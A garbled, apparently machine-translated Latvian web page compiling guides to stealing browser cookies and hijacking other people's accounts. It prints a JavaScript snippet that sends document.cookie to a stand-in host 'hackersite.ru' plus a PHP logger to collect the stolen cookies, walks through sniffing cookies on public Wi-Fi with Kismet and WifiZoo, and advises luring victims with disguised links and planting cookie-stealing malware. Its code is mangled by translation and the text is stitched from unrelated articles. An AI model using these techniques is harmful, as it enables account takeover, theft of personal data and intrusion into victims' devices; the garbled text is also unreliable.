6. darbība. Lai mainītu dažus sīkfailus, rediģējiet failu C:\IE_ext.htm, aizstājot to testa nosaukums cepuma vārdā, testa vērtība- par tā nozīmi, testdomain.ru– uz vietnes domēnu. Ja nepieciešams, pievienojiet vairāk līdzīgu rindu. Lai atvieglotu kontroli, es pievienoju skriptam pašreizējo sīkfailu izvadi pirms un pēc izmaiņām: alert(external.menuArguments.document.cookie);

7. darbība: vēlreiz veiciet 5. darbību un pēc tam atsvaidziniet lapu.

Apakšējā rinda: mēs piekļūsim šim interneta resursam ar atjauninātiem sīkfailiem.

Kā nozagt sīkfailus, izmantojot JavaScript?

Ja uzbrucējam izdodas atrast iespēju upura datorā izpildīt patvaļīgu JavaScript skriptu, viņš var ļoti viegli nolasīt pašreizējos sīkfailus. Piemērs:


var str= document.cookie;

Bet vai viņš tos varēs pārsūtīt uz savu vietni, jo, kā jau norādīju iepriekš, JavaScript skripts nevarēs piekļūt vietnei, kas atrodas citā domēnā bez papildu apstiprinājuma? Izrādās, ka JavaScript skripts var ielādēt jebkuru attēlu, kas atrodas jebkurā http serverī. Vienlaikus pārsūtiet uz šo attēlu visu lejupielādes pieprasījuma teksta informāciju. Piemērs: http://hackersite.ru/xss.jpg?text_info Tātad, ja palaižat šo kodu:

var img= jauns attēls();

img.src= "http://hackersite.ru/xss.jpg?"+ kodētURI(dokuments.sīkdatne);


tad sīkfails nonāks pieprasījumā lejupielādēt “attēlu” un “nonāks” uzbrucējam.

Kā rīkoties ar šādiem pieprasījumiem lejupielādēt “attēlu”?

Uzbrucējam tikai jāatrod mitināšana ar PHP atbalstu un jāievieto šāds kods:

$uid=urldekods($_SERVER["VAUKĀJUMS_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Pēc tam visi šī skripta pieprasījuma parametri tiks saglabāti failā log.txt. Atliek tikai aizstāt iepriekš aprakstīto JavaScript skriptu http://hackersite.ru/xss.jpg uz ceļu uz šo php skriptu.


Apakšējā līnija

Es parādīju tikai vienkāršāko veidu, kā izmantot XSS ievainojamības. Taču tas pierāda, ka vismaz vienas šādas ievainojamības klātbūtne vairāku lietotāju interneta vietnē var ļaut uzbrucējam izmantot savus resursus jūsu vārdā.

Sveiki, šis īsais raksts, diezgan pat Īss apraksts Es vēlētos veltīt sevi vienkāršs veids pārtvert sīkfailus wi-fi tīkli. Es šeit nestāstīšu, kas ir cepumi un kāpēc tie ir nepieciešami, ja cilvēks ir ieinteresēts pārtvert “maizes izstrādājumus”; bezvadu tīklā, manuprāt, viņam vajadzētu zināt, kas tas ir un kāpēc viņam tas ir vajadzīgs. Es teikšu tikai vienu: izmantojot šos failus, jūs varat piekļūt citu cilvēku kontiem dažādās vietnēs, kurās lietotājiem ir jāveic autentifikācijas process (piemēram, mail.ru, vkontakte.ru utt.).

Tātad sāksim. Pirmkārt, jāatrod pats bezvadu tīkls ar atvērtu interneta piekļuves vārteju, un vēlams, lai šim tīklam būtu diezgan daudz klientu. Piemēram, ir piemērots jebkurš tīkls lielos iepirkšanās centros, lidostās, dažādās kafejnīcās, kurās cilvēki parasti izmanto Wi-Fi piekļuve internetā, pasta lasīšanai, kontu pārbaudei dažādos iepazīšanās portālos, LJ un dažādu forumu apskatei. Tas viss ir tieši tas, kas mums vajadzīgs. Pieņemot lēmumu par tīkla atrašanās vietas izvēli, izpētot noteiktas maksimālā klientu skaita stundas, pāriesim tieši uz kaujas operācijām. Šim nolūkam mums ir nepieciešams klēpjdators ar wi-fi adapteris un noteiktu programmu komplektu. Manā gadījumā es izmantoju Acer klēpjdators Instalēta Aspire 3610, D-Link DWL G650 klienta wi-fi karte un BackTrack3 OS.

Es iesaku jums izmantot šo OS, jo tajā jau ir iekļauts viss programmu komplekts, kas jums var būt nepieciešams, un vissvarīgākā priekšrocība ir tā, ka jums nav jāinstalē Backtrack savā ierīcē. HDD, varat palaist šo OS tieši no kompaktdiska vai zibatmiņas diska.

Tagad pāriesim pie nepieciešamās programmatūras. Es izmantoju kismet tīkla atklāšanai un WifiZoo, lai pārtvertu sīkfailus. Es sīkāk pakavēšos pie otrās programmas. WifiZoo ir pasīvs gaisa viļņu skeneris un savāc diezgan daudz noderīga informācija, piemēram: pop3, smtp trafiks, http cookies/authinfo, msn, ftp akreditācijas dati, telnet tīkla trafiks, nbt utt. Vienīgais šīs programmas trūkums ir kanālu lēciena režīma trūkums, WifiZoo vienkārši klausās bezvadu interfeiss, un nevar, tā teikt, pārlēkt no kanāla uz kanālu. Bet šo trūkumu kompensē cita programma Kismet, kas atbalsta šo režīmu. Lai palaistu WifiZoo, jums būs nepieciešams:

  • pitons
  • kašķīgs
  • Kismet

Palaidīsim programmu, vispirms palaidīsim Kismet, lai atbalstītu kanālu pārlēcienu režīmu, pēc tam palaidīsim tieši WifiZoo. Jūsu priekšā vajadzētu parādīties šim logam:

Tagad atliek tikai sēdēt un gaidīt, kamēr kaut ko pārtver visu, ko programma pārtver, var atrast žurnālos, kas atrodas direktorijā ar programmu /logs/. Varat arī palaist GUI saskarni, kas automātiski izveido savienojumu ar http 127.0.0.1:8000

Es nerakstīšu par visām šīs brīnišķīgās programmas funkcijām, es domāju, ka jūs pats izdomāsit citas funkcijas, un tā kā šobrīd mūs interesē tikai sīkdatnes. Noklikšķiniet uz saites, kas saka sīkfailus, un skatiet, ko mēs pārtvērām:

Cepumu zagšanas veidi

Šī uzlaušanas metode, sīkfailu zagšana, darbojas lieliski, un to izmanto daudzi hakeri. Ja arī jūs vēlaties to izmēģināt, bet nezināt, ko darīt, izlasiet mūsu ieteikumus.

Kas ir sīkdatnes?

Šī ir informācija par lietotāja apmeklējumu noteiktā vietnē. Tas tiek glabāts atsevišķā teksta dokuments. Tur var atrast dažādu informāciju. Ieskaitot pieteikumvārdus, paroles, adreses pastkastītes un tālruņu numuri. Tāpēc zagļi cenšas tikt pie šiem dokumentiem. Lai nozagtu nepieciešamos materiālus, hakeri izmanto dažādas metodes.

Cepumu zagšanas veidi

XSS ievainojamība

To var atrast un izmantot jebkurā vietnē. Kad speciālists konstatē ievainojamību, viņš to ievieš īpašs kods. Atkarībā no mērķa kodi ir rakstīti konkrētam resursam. Kad lietotājs apmeklē šo lapu un atsvaidzina to, tiek piemērotas visas izmaiņas. Kods sāk darboties - tas tiek iegults upura datorā un apkopo visu nepieciešamo informāciju no pārlūkprogrammas.

Lai ieviestu kodu, var izmantot jebkura veida ievainojamību – kļūdu tīmekļa resursā, pārlūkprogrammā vai datorsistēmā.

Ir divu veidu XSS uzbrukumi:

Pasīvs - novirzīts uz lapas skriptu. Šajā gadījumā jums ir jāmeklē lapas elementu ievainojamības. Piemēram, cilne ar dialogiem, meklēšanas lodziņš, video katalogs utt.

Aktīvs - tie jāmeklē serverī. Tie ir īpaši bieži sastopami dažādos forumos, emuāros un tērzētavās.

Kā piespiest cilvēku lietot XSS?

Uzdevums nav viegls, jo bieži vien, lai aktivizētu kodu, ir jānoklikšķina uz saites ar to. Varat maskēt saiti un nosūtīt to e-pastā kopā ar interesantu piedāvājumu. Piemēram, piedāvājiet lielu atlaidi interneta veikalā. To visu var arī ieviest attēlā. Lietotājs, visticamāk, to apskatīs un neko nenojauš.

Sniffer uzstādīšana

Šī ir īstenošana specializētās programmas lai pārraudzītu satiksmi kāda cita ierīcē. Sniffer ļauj pārtvert pārsūtītās sesijas ar citu cilvēku datiem. Tādā veidā jūs varat iegūt visus pieteikumvārdus un paroles, adreses, jebkuras svarīga informācija ko lietotājs pārraida tīklā. Šajā gadījumā uzbrukumi visbiežāk tiek veikti neaizsargātiem HTTP datiem. Šim nolūkam labi darbojas nenodrošināts Wi-Fi.

Ir vairāki veidi, kā ieviest sniffer:

  • Kopēt trafiku;
  • Datu analīze, izmantojot satiksmes uzbrukumus;
  • Interfeisu klausīšanās;
  • Snifera ievietošana kanāla pārtraukumā.
Sīkdatņu aizstāšana

Visi dati tiek glabāti tīmekļa serverī to sākotnējā formā. Ja tos mainīsit, tas tiks uzskatīts par aizstāšanu. Visus saņemtos materiālus var izmantot citā datorā. Tādā veidā jums būs pilnīga piekļuve lietotāja personas datiem. Jūs varat modificēt sīkfailus, izmantojot pārlūkprogrammas iestatījumus, papildinājumus vai īpašas programmas. Rediģēšana ir iespējama arī jebkurā datora standarta piezīmjdatorā.

Sīkdatņu zagšana, izmantojot vīrusu

Speciālisti iesaka neizmantot sīkdatnes, ja vien pēc tām nav īpašas vajadzības. Ja ir iespēja tos atspējot, labāk to darīt. Tas ir tāpēc, ka sīkfaili ir ļoti neaizsargāti. Tos bieži nozog noziedznieki. No šiem failiem var iegūt milzīgu daudzumu personiskās informācijas. konfidenciāla informācija, kas tiks izmantots pret personu. Visbīstamākie faili ir tie, kas paliek sistēmā pēc sesijas beigām.

Sīkfaili bieži tiek nozagti, izmantojot vīrusu utilītu. Tas tiek darīts pavisam vienkārši. Jebkura droša utilīta ir iegulta ar vīrusu, kas savāc noteiktus materiālus datorā. Vīrusa programma tiks savienota ar tās īpašnieka serveri. Programma ir jākonfigurē tā, lai pārlūkprogramma to izmantotu kā starpniekserveri.

Kad programma sasniegs upura datoru, tā automātiski sāks apkopot visus saglabātos datus un nosūtīt tos jums.

Vīrusi ir dažādi, var atšķirties arī to funkcijas. Daži ļauj pilnībā kontrolēt pārlūkprogrammu un skatīt jebkādu informāciju. Citi spēj nozagt aizsargātus materiālus. Vēl citi apkopo tikai nenodrošinātus datus.

Jums var rasties grūtības ar vīrusu programmas ievadīšanu kāda cita datorā. Ir nepieciešams piespiest lietotāju to lejupielādēt un palaist. Šeit varat nosūtīt viņam vēstuli ar saiti uz programmu vai arī atzīt programmu par drošu un gaidīt, kamēr persona to lejupielādēs no jūsu vietnes.

Kā aizsargāt sīkfailus no zādzībām?

Lielākā daļa tīmekļa resursu nav pietiekami aizsargāti. Hakeri šajās platformās viegli atrod ievainojamības un kļūdas.

Sīkdatņu aizsardzības noteikumi:

  1. Saistiet datora ID ar pašreizējo sesiju. Pēc tam, kad piesakāties vietnē no trešās puses ierīces, tiks sākta jauna sesija, un dati no iepriekšējās netiks izgūti.
  2. Saistiet sesiju ar pārlūkprogrammu. Darbosies tāds pats princips kā iepriekšējā punktā.
  3. Šifrējiet tīklā nosūtītos parametrus. Tad dokumentā glabātā informācija nebūs saprotama. Tas būs bezjēdzīgi tam, kurš to pārtvēra. Šis paņēmiens neaizsargās jūs 100%; daži speciālisti var atšifrēt jebkurus materiālus.
  4. Izveidojiet atsevišķu mapi identifikatoriem.

Kā, izmantojot sīkfailus, uzzināt kāda cita konta paroli?

Lai iegūtu kāda cita pieteikšanās datus, vispirms jānokļūst failā, kurā tie tika saglabāti.

Tiem, kas lieto Mozilla Firefox jums jāiet uz cilni Rīki, kas atrodas galvenajā izvēlnē. Tālāk sistēmas iestatījumos atradīsi sadaļu “Aizsardzība”, kurā jāmeklē visa svarīgā informācija par kontiem sociālajos tīklos. Visas paroles ir paslēptas, tāpēc noklikšķiniet uz pogas “Parādīt”. Jūs varat nekavējoties instalēt aizsardzību un ievietot īpašu kodu. Tad neviens, izņemot jūs, nesaņems šo informāciju.

Operā publiskai apskatei ir pieejami tikai lietotājvārdi. Bet izvēlnē var atrast paroļu pārvaldnieku un apskatīt visu datorā saglabāto. Pilns saraksts atrodas pārvaldniekā. Lai piekļūtu parolēm, ir jāinstalē papildu paplašinājums.

IN Google Chrome Visus šos materiālus var redzēt papildu iestatījumos. Ir cilne ar visiem saglabātajiem sīkfailiem.

Diemžēl, standarta pārlūkprogramma Internet Explorer nav šādu funkciju. Lai uzzinātu informāciju par tīmekļa platformām, kuras apmeklē datora īpašnieks, jums ir jālejupielādē īpaša programma. Jūs to varat atrast internetā bez maksas, tas ir pilnīgi drošs, taču labāk to lejupielādēt no uzticamiem avotiem. Neaizmirstiet, ka jebkura programma ir jāpārbauda ar pretvīrusu. Tas jo īpaši attiecas uz tām utilītprogrammām, kas strādā ar parolēm.

Šis paņēmiens ir piemērots tikai tiem, kam ir fiziska piekļuve upura datoram. Varat arī uzzināt kāda cita paroli, ja persona ir pieteikusies platformā, izmantojot jūsu datoru un saglabājusi savus datus.

Programmas sīkfailu zagšanai

Internetā ir daudz hakeru forumu, kuros hakeri sazinās savā starpā. Cilvēki turp dodas, cerot saņemt bezmaksas palīdzību. Tieši tur var atrast milzīgu skaitu dažādu uzlaušanas programmu. Mēs vēlamies jūs brīdināt, ka jums nevajadzētu uzticēties šīm programmām. Utilītas sīkfailu attālinātai zagšanai no kādas citas ierīces ir manekeni vai vīrusu programmas. Ja lejupielādējat šo programmatūru savā datorā, jūs, visticamāk, nonāksit krāpnieka slazdā. Krāpnieki izliek programmas bez maksas. Tādējādi viņi izplata vīrusu programmatūru un iegūst kontroli pār citu cilvēku datoriem. Kopumā šādas programmas ir krāpniecība, jūs to sapratīsit pēc to saskarnes un satura. Ja jūs gatavojaties izmantot jebkuru programmatūru, lai iegūtu failus, tad ļaujiet tai būt sniffers. Protams, to izmantošana nav tik vienkārša. Un atrast labu šņaukāju internetā nav viegli. Bet šāda programmatūra ir pieejama pie speciālistiem, kuri var jums to pārdot par naudu. Atcerieties, ka ir daudz krāpnieku, katram ir savi triki. Uzticieties tikai uzticamiem hakeriem, kuriem ir laba reputācija, atsauksmes un sava vietne.

Nobeigumā vēlos atzīmēt, ka sīkdatņu zagšana ir patiesi spēcīga metode, kuras efektivitāte ir ļoti augsta. Ja vēlaties uzlauzt kāda profilu sociālajā tīklā vai tūlītējās ziņojumapmaiņas programmā, noteikti apsveriet šo iespēju. Šī metode vislabāk darbojas, ja varat izmantot cietušā datoru. Materiālus iegūt no attāluma ir daudz grūtāk, taču varat izmantot mūsu padomus un mēģināt pielietot šo metodi praksē.

Nodaļā



 


Lasīt:



Android viedtālruņa savienošana ar datoru, izmantojot Wi-Fi Tālruņa savienošana ar datoru, izmantojot Wi-Fi

Android viedtālruņa savienošana ar datoru, izmantojot Wi-Fi Tālruņa savienošana ar datoru, izmantojot Wi-Fi

Kā bezvadu režīmā savienot Android planšetdatoru vai tālruni ar datoru. Kā pārsūtīt failus un skatīties video no datora. Par datu sinhronizācijas sarežģījumiem...

Patiesais RMS ir vienīgais pareizais mērījums

Patiesais RMS ir vienīgais pareizais mērījums

Ievads Maiņstrāvas sprieguma patiesā RMS mērīšana nav gluži vienkāršs uzdevums, un tas nav arī tas, kā šķiet no pirmā acu uzmetiena. Pirmkārt jau tāpēc, ka...

Inženiertehniskie paraugi Skylake (LGA1151) - Zionoviki

Inženiertehniskie paraugi Skylake (LGA1151) - Zionoviki

Intel procesoru progress, mainot mikroarhitektūras paaudzes, pēdējā laikā ir ievērojami palēninājies. Patiešām, ja...

Kāpēc viedtālruņu magnētiskie kabeļi ir bīstami un noderīgi

Kāpēc viedtālruņu magnētiskie kabeļi ir bīstami un noderīgi

Mantis USB uz USB Type-C neilona magnētiskais kabelis ir ērts un moderns aksesuārs, kas paredzēts viedtālruņa savienošanai ar lādētāju...

plūsmas attēls RSS